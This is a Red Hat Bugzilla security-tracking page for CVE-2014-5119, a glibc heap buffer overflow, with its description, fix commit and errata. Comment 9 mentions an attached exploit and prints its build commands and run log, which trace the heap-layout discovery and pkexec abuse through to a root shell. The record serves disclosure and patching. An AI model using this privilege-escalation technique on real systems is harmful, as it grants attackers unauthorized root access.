Bug 1119128 (CVE-2014-5119) - CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find()
Summary: CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow...
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2014-5119
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL: https://sourceware.org/ml/libc-alpha/...
Whiteboard: impact=important,public=20140714,repo...
: 1129743 (view as bug list)
Depends On: 1129745 1133807 1133808 1133809 1133810 1133811 1133812 1134210 1134211 1134212 1134213
Blocks: 1119129 1129744
TreeView+ depends on / blocked
 
Reported: 2014-07-14 05:30 UTC by Murray McAllister
Modified: 2019-06-08 20:06 UTC (History)
35 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.
Clone Of:
Environment:
Last Closed: 2014-08-29 21:50:01 UTC


Attachments (Terms of Use)
CVE-2014-5119 exploit for Fedora 20 32-bit (5.92 KB, application/octet-stream)
2014-08-26 02:00 UTC, Tavis Ormandy
no flags Details


Links
System ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2014:1110 normal SHIPPED_LIVE Important: glibc security update 2014-08-30 01:40:58 UTC
Red Hat Product Errata RHSA-2014:1118 normal SHIPPED_LIVE Important: glibc security update 2014-09-02 22:09:39 UTC
Sourceware 17187 None None None 2019-06-27 15:22:30 UTC
Red Hat Knowledge Base (Solution) 1176253 None None None Never

Description Murray McAllister 2014-07-14 05:30:08 UTC
Tavis Ormandy reported an off-by-one error leading to a heap-based buffer overflow flaw in glibc's __gconv_translit_find() function. This could be triggered by setting the CHARSET environment variable to a malicious value. This could possibly lead to code execution as root if a set user ID (setuid) root application used this environment variable without sanitizing its value.

References:

http://www.openwall.com/lists/oss-security/2014/07/14/1
http://www.openwall.com/lists/oss-security/2014/07/14/2

Comment 6 Murray McAllister 2014-08-15 01:24:34 UTC
MITRE assigned CVE-2014-5119 to this issue:

http://seclists.org/oss-sec/2014/q3/358

Upstream bug:

https://sourceware.org/bugzilla/show_bug.cgi?id=17187

Comment 7 Murray McAllister 2014-08-15 01:28:41 UTC
*** Bug 1129743 has been marked as a duplicate of this bug. ***

Comment 8 Murray McAllister 2014-08-15 01:33:28 UTC
Further information from Tavis Ormandy:

https://sourceware.org/ml/libc-alpha/2014-07/msg00590.html

Comment 9 Tavis Ormandy 2014-08-26 02:00:49 UTC
Created attachment 930687 [details]
CVE-2014-5119 exploit for Fedora 20 32-bit

It's been a few months without progress, here's an exploit.

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@localhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl  pkexploit.c   -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl  pty.c   -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320  -c -o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@localhost glibc]$ ./pkexploit 
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing /: File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit

Comment 10 Huzaifa S. Sidhpurwala 2014-08-26 03:16:32 UTC
Statement:

(none)

Comment 14 Tomas Hoger 2014-08-26 18:42:05 UTC
Upstream commit:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=a1a6a401ab0a3c9f15fb7eaebbdcee24192254e8

It removes affected functionality - support for loadable gconv transliteration modules - which was non-functional for a long time.

Comment 16 Martin Prpič 2014-08-26 21:12:39 UTC
IssueDescription:

An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.

Comment 32 errata-xmlrpc 2014-08-29 21:41:25 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5
  Red Hat Enterprise Linux 6
  Red Hat Enterprise Linux 7

Via RHSA-2014:1110 https://rhn.redhat.com/errata/RHSA-2014-1110.html

Comment 34 errata-xmlrpc 2014-09-02 18:11:38 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5.6 Long Life
  Red Hat Enterprise Linux 5.9 EUS - Server Only
  Red Hat Enterprise Linux 6.2 AUS
  Red Hat Enterprise Linux 6.4 EUS - Server and Compute Node Only

Via RHSA-2014:1118 https://rhn.redhat.com/errata/RHSA-2014-1118.html


Note You need to log in before you can comment on or make changes to this bug.